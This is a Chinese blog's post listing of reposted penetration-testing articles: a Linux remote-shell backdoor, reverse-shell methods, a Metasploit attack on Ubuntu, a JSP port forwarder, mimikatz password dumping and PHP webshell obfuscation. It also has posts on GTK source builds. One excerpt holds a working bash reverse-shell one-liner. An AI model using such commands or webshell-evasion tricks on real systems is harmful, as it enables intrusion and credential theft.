- 博客(11)
- 收藏
- 关注
RSS订阅转载 远程shell后门C代码(linux)
// Wr1tt3n by phr0z #include #include #include #include #include #include #include #include #include #define PORT 12345 // the port client will be connecting to #define SHELL "/bin/sh" //
2015-05-06 11:12:14
1082
转载 dup linux C
#include int dup(int fd); int dup2(int fd1,int fd2); 两个均为复制一个现存的文件的描述 两个函数的返回:若成功为新的文件描述,若出错为-1; 由dup返回的新文件描述符一定是当前可用文件描述中的最小数值。用dup2则可以用fd2参数指定新的描述符数值。如果fd2已经打开,则先关闭。若fd1=fd2,则dup2
2015-05-06 11:10:53
498
转载 Linux下反弹shell方法
大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,今天再告诉大家几种方法,国外大牛和国内大牛整理的,希望大家喜欢。 bash版本: 1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以
2015-05-06 11:06:02
662
转载 Metasploit渗透Ubuntu 12.04攻击测试演练
转载FreeBuf.COM 这篇文章写来主要是一次娱乐性的练习。共享出攻击的细节,其中包括一些经过原作者修改过的各种来源的脚本文件。渗透的过程不是重点,之所以发出来最大的原因主要是文章后半部分维持持久化攻击的一些地方还是很值得学习的,顺便大家也可以再次熟悉一下MSF框架。希望对大家有所帮助。 攻击环境: Ubuntu12.04LTS 32bit(靶机,默认的软件安装配置) V
2014-11-26 21:20:11
1552
转载 JSP端口转发工具 – KPortTran
渗透过程中,由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能,具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说,可以比较方便的实现端口转发。 在这里发布出来,小伙伴们使用过程中,如果发现什么bug欢迎提交哈~ 参数说明 /KPortTran.jsp? lip
2014-11-06 16:28:49
565
转载 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码!
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: http://blog.gentilkiwi.com/mimikatz 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-clea
2014-11-04 16:43:26
918
转载 纪念一次Ubuntu8.04下的GTK源码安装经历
GTK依赖于特定的库: GLib 库 ATK 库 Cairo 库 Pango 库 依赖库的安装顺序: 根据依赖关系的要求,库的安装要按照这样的先后顺序进行: GLib、Atk、Cairo、Pango、Gtk+. 解压bz2和xz包命令及源码编译GTK+库: tar xvfj gtk+-3.2.0.tar.bz2 tar x
2014-11-03 16:25:16
520
原创 几个linux库文件下载的站点
http://ftp.gnome.org/pub/gnome/sources/ http://download.chinaunix.net/download/
2014-11-03 10:45:36
447
转载 源码安装gtk+-2.0时遇到的几个问题及解决办法
我用的发行版是 Ubuntu7.04,最简单的办法就是用“新立得软件包管理器”,安装“libgtk2.0-dev”这个包即可。 但我打算从源码安装。 需要下载的包: ftp://mirrors.kernel.org/gnu/gettext/gettext-0.17.tar.gz ftp://ftp.gtk.org/pub/glib/2.15/glib-2.15.1.tar.bz2 ftp
2014-11-03 10:06:15
917
转载 PHP一句话Webshell变形总结
[笔记]PHP一句话Webshell变形总结 darkray @ WEB安全 2012-10-12 共 10565 人围观,发现 4 个不明物体收藏该文 0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还
2014-09-28 16:42:41
3714
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人